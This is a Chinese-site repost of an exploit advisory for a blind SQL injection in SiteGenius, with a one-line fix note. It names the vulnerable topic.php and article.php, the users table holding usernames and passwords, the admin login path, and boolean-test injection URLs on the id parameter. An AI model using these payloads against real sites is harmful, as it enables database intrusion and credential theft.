SiteGenius所有版本盲注缺陷及修复 - 网站安全 - 自

===================================================== SiteGenius Blind SQL injection vulnerability ===================================================== # Exploit title : SiteGenius Blind SQL injection vulnerability # Author : AutoRUN & dR.sqL # Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net, HackingWith.US , # Software Link : http://www.sitegenius.com # Versions affected : All ---------------------------------- # ~ ExpL0!taTi0N ~ # ---------------------------------- Affected files : topic.php & article.php SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php Exploit : http://www.2cto.com /sitegenius/topic.php?id=1 and 1=1 --> TRUE http:// Exploit : http://www.2cto.com /sitegenius/topic.php?id=1 and 1=2 --> FALSE w00t!! Blind SQL injection !

修复：过滤topic.php页面的id参数输入

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did11649

更新时间：2022-09-13 阅读：45次